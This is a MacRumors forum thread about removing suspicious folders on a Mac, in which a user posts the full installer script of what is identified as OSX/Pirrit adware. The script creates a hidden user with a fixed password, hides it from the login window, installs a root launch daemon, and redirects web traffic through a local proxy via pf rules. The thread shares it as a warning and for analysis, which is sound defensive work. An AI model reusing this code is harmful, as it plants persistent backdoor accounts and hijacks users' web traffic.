Become a MacRumors Supporter for $50/year with no ads, ability to filter front page stories, and private forums.

Weaselboy

Moderator
Staff member
Jan 23, 2005
34,465
16,164
California
I agree with you it is likely okay to delete, but try a boot to safe mode by holding the shift key at startup. That should delete that whole folder. If it is still there afterwards, do a good clone in case things go badly then try and delete from Terminal.
 

Kitu

macrumors newbie
Original poster
Apr 5, 2016
12
2
Thanks WB - appreciated! I shall follow your advice.

Cheers, K.
 

wandal

macrumors newbie
Feb 17, 2010
18
0
Italy
hi everybody.

Nasty things here, we opened one of the damned files, setupinjector.sh, and here it is.
So, you can notice how the "casual" titles are built up. Chamaleontic behaviour. And spreadwide in so many hidden folders.

#!/bin/sh
updf="/var/tmp/updt.txt"

# get random names
n=$(cat /usr/share/dict/words | wc -l)

companyName=$(cat -n /usr/share/dict/words | grep -w $(jot -r 1 1 $n) | cut -f2)
echo $companyName

# create hidden user
HIDDEN_USER=$(cat -n /usr/share/dict/words | grep -w $(jot -r 1 1 $n) | cut -f2)
echo $HIDDEN_USER >> $updf
userName=$HIDDEN_USER

preferencesFileName="com."
preferencesFileName+=$companyName
preferencesFileName+=".plist"
echo $preferencesFileName >> $updf

netPreferencesFileName="com."
netPreferencesFileName+=$companyName
netPreferencesFileName+=".plist"
echo $netPreferencesFileName >> $updf

settingsFileName=$companyName
settingsFileName+=".sh"

configFileName=$companyName
configFileName+=".conf"

settingsFileData="#!/bin/sh\n\
\n\
if [ -a /Library/"$companyName"/Contents/MacOS/"$companyName" ];\n\
then\n\
sleep 10\n\
sudo pfctl -evf /etc/"$configFileName"\n\
sudo -u "$userName" /Library/"$companyName"/Contents/MacOS/"$companyName"\n\
fi\n\
exit 0\n"
echo "$settingsFileData" > /etc/$settingsFileName
sudo chown root /etc/$settingsFileName
sudo chmod 755 /etc/$settingsFileName

# copy files
sudo cp -r Injector.app $companyName
sudo cp -r $companyName /Library
sudo rm -r $companyName
sudo chmod -R 755 "/Library/"$companyName

#change name of the exe
sudo mv "/Library/"$companyName"/Contents/MacOS/Injector" "/Library/"$companyName"/Contents/MacOS/"$companyName

#configure hidden account
HIDDEN_PASS=test
HIDDEN_UID=401
HIDDEN_NAME="User "$HIDDEN_USER

HIDDEN_HOME="/var/$HIDDEN_USER"

sudo dscl . -create /Users/$HIDDEN_USER UniqueID $HIDDEN_UID
sudo dscl . -create /Users/$HIDDEN_USER PrimaryGroupID 20
sudo dscl . -create /Users/$HIDDEN_USER NFSHomeDirectory "$HIDDEN_HOME"
sudo dscl . -create /Users/$HIDDEN_USER UserShell /bin/bash
sudo dscl . -create /Users/$HIDDEN_USER RealName "$HIDDEN_NAME"
sudo dscl . -passwd /Users/$HIDDEN_USER $HIDDEN_PASS
sudo mkdir "$HIDDEN_HOME"
sudo chown -R $HIDDEN_USER "$HIDDEN_HOME"
sudo chmod a+rwx "/Library/"$companyName"/Contents/MacOS/"$companyName

# Enable the Hide500Users attribute
sudo defaults write /Library/Preferences/com.apple.loginwindow Hide500Users -bool YES

# read parameters
dist_channel_id=$1
machine_id=$(ioreg -rd1 -c IOPlatformExpertDevice | awk '/IOPlatformUUID/ { split($0, line, "\""); printf("%s\n", line[4]); }')
click_id=$2
domain=$3

if [ -z "$dist_channel_id" ];
then
echo "Default for dist channel" >> $updf
dist_channel_id="A1000"
fi

if [ -z "$click_id" ];
then
echo "Default for click id" >> $updf
click_id="0"
fi

if [ -z "$domain" ];
then
echo "Default for domain"
domain="http://aadcd15734d97346bb85f545dc8ca03e7e.com"
fi

# write parameters to preferences file
sudo defaults write "/Library/Preferences/"$preferencesFileName dist_channel_id "$dist_channel_id"
sudo defaults write "/Library/Preferences/"$preferencesFileName machine_id "$machine_id"
sudo defaults write "/Library/Preferences/"$preferencesFileName click_id "$click_id"
sudo defaults write "/Library/Preferences/"$preferencesFileName domain "$domain"
sudo plutil -convert xml1 "/Library/Preferences/"$preferencesFileName

# INSTALL SERVER
# set redirections
activeInterface=$(route get default | sed -n -e 's/^.*interface: //p')
if [ -n "$activeInterface" ]; then
pfData="rdr pass inet proto tcp from $activeInterface to any port 80 -> 127.0.0.1 port 9882\n\
pass out on $activeInterface route-to lo0 inet proto tcp from $activeInterface to any port 80 keep state\n\
pass out proto tcp all user "$HIDDEN_USER"\n"
echo "$pfData" > /etc/$configFileName

# run server
sudo cp com.pref.plist "/Library/LaunchDaemons/"$netPreferencesFileName
sudo defaults write "/Library/LaunchDaemons/"$netPreferencesFileName Label "$netPreferencesFileName"
sudo defaults write "/Library/LaunchDaemons/"$netPreferencesFileName ProgramArguments -array '/etc/'$settingsFileName''
sudo chmod 755 "/Library/LaunchDaemons/"$netPreferencesFileName
sudo launchctl load -w "/Library/LaunchDaemons/"$netPreferencesFileName

else
echo "Unable to find active interface" >> $updf
exit 1
fi

exit 0
 

0xAmit

macrumors newbie
Apr 6, 2016
3
5
Israel
All,
Last week I gave a talk at the LayerOne security conference in Los Angeles about Osx/Pirrit. You can watch it here:
 
  • Like
Reactions: Weaselboy
Register on MacRumors! This sidebar will go away, and you'll see fewer ads.